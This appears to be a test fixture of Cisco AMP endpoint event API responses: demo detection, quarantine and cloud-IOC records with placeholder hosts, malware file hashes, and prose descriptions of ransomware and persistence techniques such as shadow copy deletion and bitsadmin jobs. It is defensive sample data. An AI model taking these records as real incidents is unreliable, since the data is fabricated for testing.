-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a
8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5
e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. 
While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. 
This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. 
Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. 
Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. 
This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch 
Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud 